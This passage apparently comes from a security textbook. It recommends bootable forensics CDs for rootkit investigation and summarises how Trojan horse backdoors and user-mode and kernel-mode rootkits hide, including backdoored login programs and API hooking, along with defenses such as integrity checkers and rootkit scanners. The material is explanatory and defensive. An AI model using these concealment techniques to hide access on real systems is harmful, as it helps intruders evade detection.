Next, get a copy of a trusted CD designed for incident handling and forensics analysis. Two of my favorite tools in this category are Helix, free at www.e-fense.com/helix, and Knoppix-STD, free at www.knoppix-std.org. Both tools are bootable Linux environments, rendered in a CD image format. Download these CD image files and burn them to a CD. Then, investigators can insert the Helix or Knoppix-STD CD in a potentially compromised machine, and boot from the CD. As the system shuts down, the potentially evil, deceiving kernel and executables will stop running. When the system reboots, the trusted kernel from Helix or Knoppix will be loaded into memory. Because this new kernel is grabbed from the CD, an investigator can use it to read the victim machine’s file system with more trustworthy results than one can get from an evil kernel. Therefore, after booting from the CD, the investigator can run a file integrity checker (built into the CD, of course) to look for changes.

“But, how can I use a bootable Linux CD like Helix or Knoppix-STD to analyze my Windows system?” you might ask. Well, although Helix and Knoppix-STD are bootable Linux images, they include a variety of tools for mounting and analyzing Windows disk partitions. If you don’t want to work in Linux, Helix even include Windows executables that mimic the functions of such tools as the dir command, the File Explorer, the netstat command, and the Windows command shell. Of course, if you use the executables from the Helix CD on a machine with a running rootkitted kernel, that kernel will still lie to your Helix tools. But, by booting the Helix Linux image, the evil kernel won’t be around any more, and you can conduct more thorough analysis from within Linux. Thus, Helix and Knoppix-STD can be used in most environments with Windows, Linux, and even other UNIX operating systems.

Conclusion

In this chapter, we have seen a variety of techniques that attackers use to maintain access on a system. They often add software or manipulate the functionality of the operating system itself to lurk on the machine. The tools used for such techniques are getting much more sophisticated, targeting the most fundamental levels of our operating systems. A large number of rootkits, and kernel-mode rootkits in particular, are in active development, with new and powerful features being frequently added.

While altering a system to maintain access, attackers often employ a variety of techniques to cover their tracks. In the next chapter, we explore many of these tactics for hiding on a system.

Summary

After gaining access to a target machine, attackers want to maintain that access. They use Trojan horses, backdoors, and rootkits to achieve this goal. A Trojan horse is a program that looks like it has some useful purpose, but really hides malicious functionality. Backdoors give an attacker access to a machine while bypassing normal security controls.

Backdoors and Trojan horses are the most damaging when they are melded together. The resulting Trojan horse backdoors can operate at a variety of levels. Application-level Trojan horse backdoors involve running a separate application on the target machine that looks innocuous, but gives the attacker access to and control of the victim machine. Remote-control programs, bots, and spyware are three of the most popular categories of application-level Trojan horse backdoor. These tools can be used to access any file on the victim’s machine, watch the user’s actions in the GUI, and log keystrokes, among numerous other features. The best defense against application-level Trojan horse backdoors is to utilize up-to-date antivirus and antispyware tools and avoid malicious software.

User-mode rootkits go to a deeper level of the operating system than application-level Trojan horse backdoors. User-mode rootkits replace critical system executable programs, such as the login and sshd programs in UNIX and Linux. Attackers replace them with another version that includes a backdoor password. Additionally, attackers rely on user-mode rootkits to replace many other programs, such as ifconfig, ls, ps, and du, all of which act as the eyes and ears of a system administrator. By altering these programs, the attackers can mask their presence on the system. Alternatively, on a Windows machine, the bad guys use debug privileges to inject code into running processes to hook their API calls. That way, when programs such as Task Manager or netstat attempt to determine the status of the system, the attacker can hide certain critical information, such as specific processes, files, and TCP ports. To defend against user-mode rootkits, you should employ file system integrity checking tools, such as Tripwire, on sensitive systems. These tools calculate cryptographic hashes of key system files, and can detect changes caused by rootkits.

Kernel-mode rootkits are the nastiest Trojan horse backdoors we face on a regular basis today. Using these tools, the attacker alters the kernel of the target operating system to provide backdoor access and hide on the system. Most kernel-mode rootkits provide execution redirection to remap a user’s request to run a program so that a program of the attacker’s choosing is executed. Kernel-mode rootkits also support hiding files, directories, TCP and UDP port usage, and running processes.

To defend against kernel-mode rootkits, you should keep attackers from gaining super-user access in the first place by applying system patches and host-based IPSs. Tools such as Chkrootkit and Rootkit Hunter for Linux and UNIX, as well as Rootkit Revealer and Blacklight for Windows, look for anomalies introduced on a system by various user-mode and kernel-mode rootkits. Furthermore, antivirus tools can help prevent many of the most popular kernel-mode rootkits from being installed in the first place. And, although a perfectly implemented and perfectly deployed kernel-mode rootkit can dodge a file integrity checker, these tools are more important now than ever, because they can find very subtle mistakes made by an attacker that a human might miss. Finally, bootable Linux CDs such as Helix and Knoppix-STD provide a useful tool chest of incident response and forensics tools, with output that you can trust more than the lies told by user-mode and kernel-mode rootkits.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.227.161.132